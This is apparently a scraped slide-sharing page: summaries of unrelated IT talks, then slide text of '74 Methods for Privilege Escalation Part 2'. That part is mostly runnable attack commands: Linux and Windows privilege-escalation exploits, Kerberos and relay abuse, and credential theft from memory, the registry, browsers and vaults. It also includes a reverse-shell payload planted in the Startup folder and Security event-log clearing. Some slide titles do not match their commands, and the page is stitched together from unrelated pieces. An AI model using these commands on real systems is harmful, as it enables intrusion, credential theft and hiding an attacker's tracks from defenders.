This document provides an agenda for a session on adding calendars to Domino web applications using FullCalendar. It will cover:
- An introduction to the presenters and their goals for the session
- An overview of what FullCalendar is and how it can be used
- An example of implementing FullCalendar in an XPages application with a REST service to populate calendar entries
- Options for using FullCalendar if no longer using XPages, such as with Angular, React, or a standalone REST service
The session will demonstrate building a FullCalendar component in an XPages application that retrieves and saves calendar entries to Domino via a REST service and Java class. It will also discuss approaches to re-architect
The document discusses different multi-threading models: many-to-one, one-to-one, and many-to-many. The many-to-one model maps many user threads to a single kernel thread, allowing for efficient thread management but blocking all threads during system calls. The one-to-one model maps each user thread to its own kernel thread, enabling more concurrency and parallelism across processors but requiring more kernel resources. The many-to-many model multiplexes user threads to kernel threads, allowing scheduling around blocking system calls while using kernel resources efficiently.
The document provides an overview of Tomcat and JBoss, open-source servlet containers. It discusses the origins and frameworks of Tomcat and JBoss, how to get started with Tomcat configuration, deployment, security, and load balancing of Tomcat instances with Apache HTTP Server. Key configuration files for Tomcat are also summarized.
IBM MQ systems route billions of messages around the world each day. This presentation looks at the tools available in MQ for z/OS to allow you to understand where your messages are flowing, and things you can use if the messages aren't going where you expect.
Domino Tech School - Upgrading to Notes/Domino V10: Best Practices (Christoph Adler)
Are you looking to deploy Domino V10 but don’t know where to start? Upgrade servers or clients first? Should I upgrade the ODS? If you have questions like these, this session is for you. Get a complete understanding of the process to upgrade to Domino V10, and learn from best practices and tips from the field.
AdminP is an elementary server task for your IBM Lotus Domino Administration. This session explains which administration processes are available and how those can make your day-to-day administration tasks easier. We will cover the best practices for setup and troubleshooting using AdminP, in projects like recertifications and server consolidations.
IBM Notes Traveler Administration and Log Troubleshooting tips - Part 2 (jayeshpar2006)
This document summarizes an IBM Notes Traveler Administration and Log Troubleshooting session. It discusses understanding Traveler activity, error, and usage logs to help troubleshoot issues. Specifically, it demonstrates how to analyze logs to resolve two cases: 1) Users complaining of slow synchronization and errors connecting to the server, and 2) The Traveler server keeps going into red status. For the first case, it shows checking system dumps, CPU/memory usage, and activity logs to identify that high database connections were causing constrained server resources. For the second case, it briefly mentions another example of analyzing logs to resolve slow mail issues.
Best Practices for HCL Notes/Domino Security. Part 2: The Domino Server (panagenda)
Recording: http://pan.news/20210420de
Abstract: Servers are the backbone of your IT environment. Their security is of utmost importance to every IT professional. This becomes a particularly delicate matter for servers with remote access. There is a fine line between convenient use on the one hand and protection against attackers on the other.
Security concerns include the lack of physical security of devices, the use of unsecured networks, the unintended external availability of internal resources, and unauthorized access from within your own company.
HCL Domino is a powerful and mature server platform with a large feature set. While this makes it a good choice for many applications, it also means that there are many potential ways to make yourself vulnerable.
In this webinar, our experts help you look at every aspect of securing your Domino environments:
• Learn the basics of Domino server security
• Fix problems with the default configuration and avoid common pitfalls
• Ensure secure access via Notes client, HTTP or SMTP
• Set up database access control for your entire infrastructure
• Protect your servers against internal attacks
• Avoid vulnerabilities by keeping Domino servers and the operating system up to date
IBM Lotus Domino Domain Monitoring (DDM) (Austin Chang)
This document provides an overview of Lotus Domino Server Domain Monitoring (DDM) for administrators. DDM allows administrators to monitor servers in their domain through configurable probes that check for issues and automate corrective actions. It discusses the key components of DDM including the server collection hierarchy, monitoring configuration, probes, and filters. It also provides examples of how to set up monitoring for common scenarios like database compaction, replication, and system resources.
What is new in Notes & Domino Development V10.x (Ulrich Krause)
Slides for my session at DNUG46 in Essen, Germany, 04.-05. May 2019.
The session was all about the new classes added in V10.x of Notes/Domino. FP2 changes are included.
How to Bring HCL Nomad Web and Domino Together Without SafeLinx (panagenda)
Webinar Recording: https://www.panagenda.com/webinars/how-to-bring-hcl-nomad-and-domino-together-without-safelinx/
HCL Nomad Web is the way forward. It allows users to decide for themselves when and where they want to use the application, naturally promoting business flexibility and increasing overall employee productivity. Besides, the way forward gets a lot easier if you can bring HCL Nomad Web and Domino together without SafeLinx.
So, you want to start with Nomad Web, the new and shiny client in the browser. But there are so many hurdles in the way. Luckily, with Domino 12.0.2, a big one is gone. The new Nomad Web Server on Domino makes it possible to have Nomad Web talk directly to Domino. You do not have to use SafeLinx unless you really want to!
Join Christoph Adler, HCL Ambassador & panagenda Senior Consultant, on December 13 for this webinar featuring live demos and hands-on examples. Gain the skills you need to run Nomad Web directly with Domino and to use HCL Nomad and Domino without SafeLinx. You will leave with a simple recipe that makes it easy to get going in your environment.
In our webinar about how to run HCL Nomad configurations on any device, we showed you that MarvelClient Roaming can help you solve many challenges. It enables you to automatically back up, restore, and share configurations (desktop, recent apps, settings, and more) among devices using Nomad. It uploads configurations to your Domino servers whenever they are changed, and then transparently updates any current and new devices used by the same person, with a tiny network and processing footprint. This time we go a little further.
What you will learn
- How to use HCL Nomad Web and Domino together without SafeLinx
- How to install and configure the Nomad Web Server
- How the Nomad Web Server works from a user’s point of view
- In which scenarios you might want to keep using SafeLinx
April 2021 OpenNTF Webinar - Domino Administration Best Practices (Howard Greenberg)
While installing a new HCL Domino server is a relatively straightforward task, configuring the server properly requires knowledge. Lacking this knowledge means that several key steps may be missed, resulting in a server with potential security and performance issues. Additionally, there are several key features that will save you time on administration of the server. Domino server settings also affect the performance and security of custom applications. Even if you are a developer, you should be aware of the options available when configuring a server.
Join our incredibly experienced presenters as they share their many years of Domino expertise. They will cover the finer details of correctly setting up a Domino server environment that is optimized for performance, security and sustainable administration. Plus, use the information presented in this webinar to modify and improve your existing server environment.
Presenters:
Heather Hottenstein, HCL Ambassador
Roberto Boccadoro, HCL Ambassador
Serdar Basegmez, HCL Ambassador
Additional Panelists (Q and A)
John Paganetti, HCL
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of the privilege escalation methods, with complete descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnUser
17. Impersonation Token with SeImpersonatePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Packet Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting / Kerberoasting
Methods for Privilege Escalation Part One.pdf (rimaNova1)
The document provides 40 methods for privilege escalation on Linux and Windows systems, organized into different categories. Some of the methods involve abusing privileges of programs run as root like sudo, abusing interpreters with escalated capabilities, injecting code through SQL or Windows services, exploiting scheduled tasks, sniffing network traffic, enumerating bash history files, and more. Many of the techniques require finding and exploiting vulnerable configurations or bugs in programs or services to elevate privileges on the target system.
Jaime Piña, @variadico, Software Engineer at Apcera
Microservice issues are networking issues. Fixing code in your app is easy, but the hard part of using microservices is the networking. How do you actually know if you're sending what you think you are? Why does this request fail in my app, but not when I use curl? Is this service very slow or is it up at all?
This talk will help demystify some common problems you might experience while building out your collection of microservices. Once you can find the issue, it becomes way easier to fix.
The document discusses various methods for locking down a FreeBSD installation, including establishing a security policy, hardening access controls, and monitoring the system. Some key points covered are:
- Establish a default deny security policy with authentication required for all access and logging of all exceptions.
- Hardening involves securing the network stack, enabling a firewall, restricting inetd, using TCP wrappers, and implementing IPSec.
- Additional hardening includes removing known vulnerabilities, increasing the secure level, protecting against resource exhaustion, and restricting services.
- Intrusion detection involves tools like Tripwire, SysTrace, Snort, and honeypots, while auditing focuses on authentication and monitoring logs.
The document provides an outline for hacking different systems including performing internet footprinting, hacking Windows systems, hacking Unix/Linux systems, and hacking networks. It discusses techniques for scanning systems, enumerating services and users, penetrating targets by exploiting services or escalating privileges, gaining interactive access, and maintaining influence. It provides examples of tools that can be used for reconnaissance, attacks, and privilege escalation on the different system types. The document also covers vulnerabilities in systems like SNMP, HTTP, TFTP, and routing protocols that can be exploited, and techniques for dealing with firewalls like port scanning and redirection.
Introduction to Metasploit that we presented to the 4th year compsci students at Rhodes University, covering the basic functionality of Metasploit and penetration testing.
The practical section that Etienne made (with Ponies) will come soon.
Metasploit for Penetration Testing: Beginner Class (Georgia Weidman)
1. An introduction to Metasploit basics, terminology, and interfaces like Msfconsole.
2. A demonstration of exploiting vulnerabilities using Metasploit modules and payloads like Meterpreter.
3. A discussion of post-exploitation techniques in Metasploit like privilege escalation, lateral movement, and maintaining access.
Derbycon 2019 - I simulate therefore I catch: enhancing detection engineering... (Mauricio Velazco)
https://www.youtube.com/watch?v=7TVp4g4hkpg
Defending enterprise networks against attackers continues to present a difficult challenge for blue teams. Prevention has fallen short; improving detection and response capabilities has proven to be a step in the right direction. However, without the telemetry produced by adversary behavior, building new and testing existing detection capabilities will be constrained. Executing adversary simulations in monitored environments produces the telemetry that allows blue teams to identify gaps in visibility as well as build, test and enhance detection analytics. This presentation will describe a methodology to incorporate adversary simulation into detection programs, and will release a tool blue teams can use to test the resilience of detection controls.
This document provides guidance on hardening a Linux server for security. It recommends following the CIS and NSA security benchmarks. It suggests choosing a server-oriented Linux distribution, keeping partitions and filesystems separate, encrypting partitions and the running server, securing the boot process, using iptables and TCP wrappers for firewalls, restricting root access and using sudo, enforcing password policies, removing unnecessary packages and services, securing remote administration like SSH, disabling unnecessary Linux modules, and implementing auditing and integrity checks.
This document provides an introduction to Metasploit, a penetration testing platform used to find, exploit, and validate vulnerabilities. It discusses how to create an Android payload file using msfvenom, send it to a target device, and use Metasploit to interact with the device after payload execution. The document also lists some advantages and disadvantages of Metasploit and references used.
Linux Security APIs and the Chromium Sandbox (Patricia Aas)
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Fundamentals of Linux Privilege Escalation (nullthreat)
This document provides an introduction to techniques for Linux privilege escalation. It discusses exploiting vulnerabilities like kernel exploits, taking advantage of permissive file permissions like world-readable/writable files and SetUID programs, exploiting overly permissive sudo configurations, and issues that can arise from improper PATH variable configuration like executing a Trojan program. The document demonstrates finding and using exploits, identifying vulnerable configurations, and how an attacker could leverage each technique to escalate privileges on a target Linux system. It also provides recommendations for how to protect against these methods through patching, auditing permissions and configurations, and restricting what programs can be executed with elevated privileges.
EzSploit is a Linux bash script that automates the use of Metasploit to hack Linux systems. It allows easy generation of backdoors for Linux, Windows, and Android by compiling payloads and files to target specific platforms. The document outlines how to use EzSploit to create payloads, set up a multi-handler on Kali Linux to receive the payload, install the payload on a target Linux system, and then issue commands through Metasploit's meterpreter shell to control the victim system. It concludes by advising users to keep their systems updated and use antivirus software to protect against backdoors created by tools like EzSploit.
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitMauricio Velazco
After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.
This document provides an introduction to Metasploit, a penetration testing platform that enables users to find, exploit, and validate vulnerabilities. It discusses how Metasploit has various interfaces including a console and GUI, and describes some key advantages like its large community and frequent updates. The document then outlines steps to hack an Android device using Metasploit, including creating a payload file, sending it to the target, running Metasploit to exploit the victim's Android.
This document provides an overview and agenda for a Metasploit training session. It begins with a disclaimer that the information presented is for educational purposes only. The agenda includes introductions to Metasploit basics, information gathering, exploitation, Meterpreter basics and post-exploitation, Meterpreter scripts, Metasploit utilities like Msfpayload and Msfencode, client-side attacks, and auxiliary modules. Breaks for tea and lunch are also included on the agenda.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
Similar to 74 Methods for Privilege Escalation Part 2 (20)
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Trusted Execution Environment for Decentralized Process MiningLucaBarbaro3
Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Introduction of Cybersecurity with OSS at Code Europe 2024Hiroshi SHIBATA
I develop the Ruby programming language, RubyGems, and Bundler, which are package managers for Ruby. Today, I will introduce how to enhance the security of your application using open-source software (OSS) examples from Ruby and RubyGems.
The first topic is CVE (Common Vulnerabilities and Exposures). I have published CVEs many times. But what exactly is a CVE? I'll provide a basic understanding of CVEs and explain how to detect and handle vulnerabilities in OSS.
Next, let's discuss package managers. Package managers play a critical role in the OSS ecosystem. I'll explain how to manage library dependencies in your application.
I'll share insights into how the Ruby and RubyGems core team works to keep our ecosystem safe. By the end of this talk, you'll have a better understanding of how to safeguard your code.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
5th LF Energy Power Grid Model Meet-up SlidesDanBrown980551
5th Power Grid Model Meet-up
It is with great pleasure that we extend to you an invitation to the 5th Power Grid Model Meet-up, scheduled for 6th June 2024. This event will adopt a hybrid format, allowing participants to join us either through an online Mircosoft Teams session or in person at TU/e located at Den Dolech 2, Eindhoven, Netherlands. The meet-up will be hosted by Eindhoven University of Technology (TU/e), a research university specializing in engineering science & technology.
Power Grid Model
The global energy transition is placing new and unprecedented demands on Distribution System Operators (DSOs). Alongside upgrades to grid capacity, processes such as digitization, capacity optimization, and congestion management are becoming vital for delivering reliable services.
Power Grid Model is an open source project from Linux Foundation Energy and provides a calculation engine that is increasingly essential for DSOs. It offers a standards-based foundation enabling real-time power systems analysis, simulations of electrical power grids, and sophisticated what-if analysis. In addition, it enables in-depth studies and analysis of the electrical power grid’s behavior and performance. This comprehensive model incorporates essential factors such as power generation capacity, electrical losses, voltage levels, power flows, and system stability.
Power Grid Model is currently being applied in a wide variety of use cases, including grid planning, expansion, reliability, and congestion studies. It can also help in analyzing the impact of renewable energy integration, assessing the effects of disturbances or faults, and developing strategies for grid control and optimization.
What to expect
For the upcoming meetup we are organizing, we have an exciting lineup of activities planned:
-Insightful presentations covering two practical applications of the Power Grid Model.
-An update on the latest advancements in Power Grid -Model technology during the first and second quarters of 2024.
-An interactive brainstorming session to discuss and propose new feature requests.
-An opportunity to connect with fellow Power Grid Model enthusiasts and users.
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfflufftailshop
When it comes to unit testing in the .NET ecosystem, developers have a wide range of options available. Among the most popular choices are NUnit, XUnit, and MSTest. These unit testing frameworks provide essential tools and features to help ensure the quality and reliability of code. However, understanding the differences between these frameworks is crucial for selecting the most suitable one for your projects.
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...alexjohnson7307
Predictive maintenance is a proactive approach that anticipates equipment failures before they happen. At the forefront of this innovative strategy is Artificial Intelligence (AI), which brings unprecedented precision and efficiency. AI in predictive maintenance is transforming industries by reducing downtime, minimizing costs, and enhancing productivity.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
A Comprehensive Guide to DeFi Development Services in 2024Intelisync
DeFi represents a paradigm shift in the financial industry. Instead of relying on traditional, centralized institutions like banks, DeFi leverages blockchain technology to create a decentralized network of financial services. This means that financial transactions can occur directly between parties, without intermediaries, using smart contracts on platforms like Ethereum.
In 2024, we are witnessing an explosion of new DeFi projects and protocols, each pushing the boundaries of what’s possible in finance.
In summary, DeFi in 2024 is not just a trend; it’s a revolution that democratizes finance, enhances security and transparency, and fosters continuous innovation. As we proceed through this presentation, we'll explore the various components and services of DeFi in detail, shedding light on how they are transforming the financial landscape.
At Intelisync, we specialize in providing comprehensive DeFi development services tailored to meet the unique needs of our clients. From smart contract development to dApp creation and security audits, we ensure that your DeFi project is built with innovation, security, and scalability in mind. Trust Intelisync to guide you through the intricate landscape of decentralized finance and unlock the full potential of blockchain technology.
Ready to take your DeFi project to the next level? Partner with Intelisync for expert DeFi development services today!
Azure API Management to expose backend services securely
74 Methods for Privilege Escalation Part 2
1. 74 METHODS FOR PRIVILEGE ESCALATION - PART 2
HADESS | SECURE AGILE DEVELOPMENT
WWW.HADESS.IO
2. PART 1 SUMMARY
No  Method                                            DOMAIN  APT
1   Abusing Sudo Binaries                             NO
2   Abusing Scheduled Tasks                           Y/N
3   Golden Ticket With Scheduled Tasks                Yes
4   Abusing Interpreter Capabilities                  NO
5   Abusing Binary Capabilities                       NO
6   Abusing ActiveSessions Capabilities               NO
7   Escalate with TRUSTWORTHY in SQL Server           Y/N
8   Abusing MySQL run as root                         Y/N
9   Abusing journalctl                                N
10  Abusing VDS                                       N
11  Abusing Browser                                   N
12  Abusing LDAP                                      YES
13  LLMNR Poisoning                                   YES
14  Abusing Certificate Services                      YES
15  MySQL UDF Code Injection                          Y/N
16  Impersonation Token with ImpersonateLoggedOnUser  YES
17  Impersonation Token with SeImpersonatePrivilege   YES
18  Impersonation Token with SeLoadDriverPrivilege    YES
19  OpenVPN Credentials                               NO
20  Bash History                                      NO
21  Packet Capture                                    Y/N
22  NFS Root Squashing                                NO
23  Abusing Access Control List                       Y/N
24  Escalate With SeBackupPrivilege                   YES
3. PART 1 SUMMARY
No  Method                                DOMAIN  APT
25  Escalate With SeImpersonatePrivilege  YES
26  Escalate With SeLoadDriverPrivilege   YES
27  Escalate With ForceChangePassword     YES
28  Escalate With GenericWrite            YES
29  Abusing GPO                           YES
30  Pass-the-Ticket                       YES
31  Golden Ticket                         YES
32  Abusing Splunk Universal Forwarder    NO
33  Abusing Gdbus                         Y/N
34  Abusing Trusted DC                    YES
35  NTLM Relay                            YES
36  Exchange Relay                        YES
37  Dumping with diskshadow               YES
38  Dumping with vssadmin                 YES
39  Password Spraying                     Y/N
40  AS-REP Roasting                       YES
5. DIRTYC0W
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
gcc -pthread c0w.c -o c0w; ./c0w; passwd; id
Difficulty | APT Used | Detection
6. CVE-2016-1531
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
CVE-2016-1531.sh; id
7. POLKIT
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
poc.sh
8. DIRTYPIPE
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
./traitor-amd64 --exploit kernel:CVE-2022-0847
whoami; id
9. PWNKIT
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
./cve-2021-4034
whoami; id
10. MS14_058
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > exploit
11. HOT POTATO
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
In a command prompt type: powershell.exe -nop -ep bypass
In the PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
In the PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
To confirm that the attack was successful, in the PowerShell prompt type: net localgroup administrators
12. INTEL SYSRET
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
execute -H -f sysret.exe -a "-pid [pid]"
13. PRINTNIGHTMARE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
https://github.com/outflanknl/PrintNightmare
PrintNightmare 10.10.10.10 exp.dll
14. FOLLINA
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
https://github.com/JohnHammond/msdt-follina
python3 follina.py -c "notepad"
15. ALPC
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
https://github.com/riparino/Task_Scheduler_ALPC
16. REMOTEPOTATO0
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
17. CVE-2022-26923
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
18. MS14-068
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
19. PASSWORD MINING IN MEMORY (LINUX)
Domain: No | Local Admin: Yes | OS: Linux | Type: Enumeration & Hunt
ps -ef | grep ftp;
gdb -p ftp_id
info proc mappings
q
dump memory /tmp/mem [start] [end]
q
strings /tmp/mem | grep passw
20. PASSWORD MINING IN MEMORY (WINDOWS)
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
1. In Metasploit (msf > prompt) type:
   use auxiliary/server/capture/http_basic
   set uripath x
   run
2. In taskmgr, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu, then type:
   strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3. Copy the Base64-encoded string and in a command prompt type:
   echo -ne [Base64 String] | base64 -d
21. PASSWORD MINING IN REGISTRY
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
1. Open a command prompt and type:
   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
2. In the command prompt type:
   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
3. Notice the credentials in the output.
4. In the command prompt type:
   reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 /v ProxyUsername
5. In the command prompt type:
   reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 /v ProxyPassword
6. Notice the credentials in the output.
7. In the command prompt type:
   reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
8. In the command prompt type:
   reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
9. Make note of the encrypted passwords and type:
   C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
10. From the output, make note of the credentials.
22. PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
.\WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
Or
flog -s 10s -n 200
invoke-module LogCleaner.ps1
23. PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
.\WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
Or
flog -s 10s -n 200
wevtutil cl Security
24. STARTUP APPLICATIONS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
1. In Metasploit (msf > prompt) type:
   use multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost [Kali VM IP Address]
   run
   Open another command prompt and type:
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
2. Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".
25. PASSWORD MINING IN MCAFEESITELISTFILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpUp.exe McAfeeSitelistFiles
26. PASSWORD MINING IN CACHEDGPPPASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpUp.exe CachedGPPPassword
27. PASSWORD MINING IN DOMAINGPPPASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpUp.exe DomainGPPPassword
28. PASSWORD MINING IN KEEPASS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe keepass
Or
KeeTheft.exe
29. PASSWORD MINING IN WINDOWSVAULT
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe WindowsVault
30. PASSWORD MINING IN SECPACKAGECREDS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe SecPackageCreds
31. PASSWORD MINING IN PUTTYHOSTKEYS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe PuttyHostKeys
32. PASSWORD MINING IN RDCMANFILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe RDCManFiles
33. PASSWORD MINING IN RDPSAVEDCONNECTIONS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe RDPSavedConnections
34. PASSWORD MINING IN MASTERKEYS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpDPAPI masterkeys
35. PASSWORD MINING IN BROWSERS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpWeb.exe all
36. PASSWORD MINING IN FILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SauronEye.exe -d C:\Users\vincent\Desktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v
37. PASSWORD MINING IN LDAP
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname"
Or
Import-Module .\PowerView.ps1
